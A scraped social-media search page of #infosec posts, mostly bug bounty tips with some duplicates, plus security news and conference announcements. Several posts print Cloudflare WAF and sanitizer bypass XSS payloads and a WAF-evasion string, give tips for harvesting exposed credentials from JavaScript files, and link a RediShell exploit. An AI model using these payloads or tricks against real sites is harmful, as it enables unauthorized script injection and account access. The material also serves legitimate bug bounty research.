#infosec результаты поиска

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find "all" paths for Next.js websites:
DevTools->Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n'));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

Cloudflare Workers proxy for IP rotation and URL redirection - github.com/MrTurvey/flare… HTTP pass-through proxies for unique IP rotation, similar to fireprox #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. Cloudflare Workers proxy for IP rotation and URL redirection

- github.com/MrTurvey/flare…

HTTP pass-through proxies for unique IP rotation, similar to fireprox

#infosec #cybersec #bugbountytips

"HTML Sanitizer Bypass Cloudflare leads to XSS" payload: '<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

viehgroup's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript​:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/ 

#infosec #cybersec #bugbountytips

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

💬 Help me choose the next cybersecurity tool to break down! Which one should I explain next? 👇 Comment your pick — I’ll make a video on the winner. #CyberSecurity #EthicalHacking #InfoSec #BugBounty


🚨 Big news! A major financial institution faced a ransomware attack today, spotlighting the crucial need for stronger cybersecurity defenses. Let’s stay vigilant and boost our digital security game! 🔒💪 #CyberSecurity #StaySafe #InfoSec


🚨 Massive RDP Botnet: 100,000+ IPs from 100+ countries hammer U.S. RDP servers in sync. Likely centrally controlled — the biggest scanning wave of 2025 #CyberAttack #RDP #Infosec #Darkweb #Deepweb More breaking news from the world and the Darkweb here: deepweb.net

godeepweb's tweet image. 🚨 Massive RDP Botnet: 100,000+ IPs from 100+ countries hammer U.S. RDP servers in sync.
Likely centrally controlled — the biggest scanning wave of 2025
#CyberAttack #RDP #Infosec #Darkweb #Deepweb

More breaking news from the world and the Darkweb here: deepweb.net

🔥 The #InfoSec scene in #LATAM is buzzing! 🔥 Many events coming up, organized by @OWASP @OWASP_uy @KavaConPy @MBPinfo @UqbarUN @BSidesQueretaro @RhedCon @MticsProduccion @ekoparty & many others. Explore our LATAM hub! ➡️ infosecmap.com/latam/ #CyberSecurity #LatinAmerica

¡Guardá las fechas! Oficialmente el congreso de ciberseguridad más 🔝 ¡vuelve en noviembre! Nos encontramos en la octava edición de #KavaCon para charlar sobre las últimas tendencias, conocer a expertos y elevar tu nivel de conocimientos de este mundo que tanto nos apasiona 😎

KavaConPy's tweet image. ¡Guardá las fechas! Oficialmente el congreso de ciberseguridad más 🔝 ¡vuelve en noviembre!

Nos encontramos en la octava edición de #KavaCon para charlar sobre las últimas tendencias, conocer a expertos y elevar tu nivel de conocimientos de este mundo que tanto nos apasiona 😎


Financial, Other Industries Urged to Prepare for Quantum Computers: ift.tt/27bCuV1 by darkreading #infosec #cybersecurity #technology #news


🕵️‍♂️ OSINT = Power of Public Data No exploits, just info — the internet leaks more than you think. Learn to find what others ignore. 👁️ #OSINT #CyberSecurity #infosec #EthicalHacking #Recon

Hacker01Girl's tweet image. 🕵️‍♂️ OSINT = Power of Public Data
No exploits, just info — the internet leaks more than you think.
Learn to find what others ignore. 👁️
#OSINT #CyberSecurity #infosec #EthicalHacking #Recon

Data breach search engines for Penetration Testing and Threat Intelligence 📕 #infosec #cybersec #PenetrationTesting

0x0SojalSec's tweet image. Data breach search engines for Penetration Testing and Threat Intelligence 📕

#infosec #cybersec #PenetrationTesting

💡 Tip: Always use the FindSomething extension! You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities. #InfoSec #BugBounty #SecurityTips #AppSec

mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec
mooo_sec's tweet image. 💡 Tip: Always use the FindSomething extension!

You can often discover exposed credentials that lead to admin panel access, unauthorized entry, and critical vulnerabilities.

#InfoSec #BugBounty #SecurityTips #AppSec

APK TOOL GUI Tools: easier for reverse engineering and Android pentesting - github.com/AndnixSH/APKTo… #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. APK TOOL GUI Tools:  easier for reverse engineering and Android pentesting 

- github.com/AndnixSH/APKTo…

#infosec #cybersec #bugbountytips

I was able to bypass rate limiting using this on mostly websites. #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. I was able to bypass rate limiting using this on mostly websites. 

#infosec #cybersec #bugbountytips

💡 Tip: always check .js files for Authorization: "Basic" You can often find unauthorized access and it can lead to critical bugs. #BugBounty #InfoSec #SecurityTips #InformationDisclosure

mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure
mooo_sec's tweet image. 💡 Tip: always check .js files for

 Authorization: &quot;Basic&quot; 

 You can often find unauthorized access and it can lead to critical bugs.

#BugBounty #InfoSec #SecurityTips #InformationDisclosure

New XSS Bypass Cloudflare WAF Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E #BugBounty #bugbountytips #infosec

viehgroup's tweet image. New XSS Bypass Cloudflare WAF

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E 

#BugBounty #bugbountytips #infosec

Alhamdulilah 🖤 #BugBounty #InfoSec

ide9x's tweet image. Alhamdulilah 🖤

#BugBounty #InfoSec

Use NextJS? Recon ✨ A quick way to find "all" paths for Next.js websites: DevTools->Console console.log(__BUILD_MANIFEST.sortedPages) javascript​:console.log(__BUILD_MANIFEST.sortedPages.join('\n')); Cred = linkedin.com/in/0xsojalsec?… #infosec #cybersec #bugbountytips

ofjaaah's tweet image. Use NextJS? Recon ✨

A quick way to find &quot;all&quot; paths for Next.js websites:
DevTools-&amp;gt;Console

console.log(__BUILD_MANIFEST.sortedPages)

javascript​:console.log(__BUILD_MANIFEST.sortedPages.join(&apos;\n&apos;));

Cred = linkedin.com/in/0xsojalsec?…

#infosec #cybersec #bugbountytips

The payload contains '|/???/\b**\h,' which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. image by: win3zz #cybersec #BugBountytips #infosec

0x0SojalSec's tweet image. The payload contains &apos;|/???/\b**\h,&apos; which is meant to confuse WAF rules. Unusual characters are a common evasion tactic. 

image by:  win3zz

#cybersec #BugBountytips #infosec

"HTML Sanitizer Bypass Cloudflare leads to XSS"🛠️ payload: '<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/ #infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips
0x0SojalSec's tweet image. &quot;HTML Sanitizer Bypass Cloudflare leads to XSS&quot;🛠️ 

payload: &apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:alert(&apos;XSS-Bypass&apos;)&quot;&amp;gt;XSS-CLick&amp;lt;/00&amp;gt;--%20/  

#infosec #cybersec #bugbountytips

0x0SojalSec's tweet image. RediShell exploit :

- github.com/raminfp/redis_…

#infosec #cybersec #bugbountytips

💥 Wiz Research has uncovered a critical Redis vulnerability that's been hiding for 13 years We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It's rated CVSS 10 - the highest severity possible. The vulnerability lets…

wiz_io's tweet image. 💥 Wiz Research has uncovered a critical Redis vulnerability that&apos;s been hiding for 13 years

We found RediShell (CVE-2025-49844): an RCE bug in Redis that affects every version of Redis out there. It&apos;s rated CVSS 10 - the highest severity possible.

The vulnerability lets…


Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation github.com/0xor0ne/awesom… #infosec

0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec
0xor0ne's tweet image. Blog posts, write-ups, papers and tools related to cybersecurity, reverse engineering and exploitation

github.com/0xor0ne/awesom…

#infosec

Cloudflare WAF Bypass → XSS 💡 The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS: --'<00 foo="<a%20href="javascript:prompt(404)">XSS-Click</00>--%20// #CyberSecurity #InfoSec #BugBounty #XSS

bughuntar's tweet image. Cloudflare WAF Bypass → XSS 💡

The vulnerability occurred because the URL was being printed directly in JavaScript. Used this payload to achieve reflected XSS:

--&apos;&amp;lt;00 foo=&quot;&amp;lt;a%20href=&quot;javascript:prompt(404)&quot;&amp;gt;XSS-Click&amp;lt;/00&amp;gt;--%20//

#CyberSecurity #InfoSec #BugBounty #XSS…

Loading...

Something went wrong.


Something went wrong.


United States Trends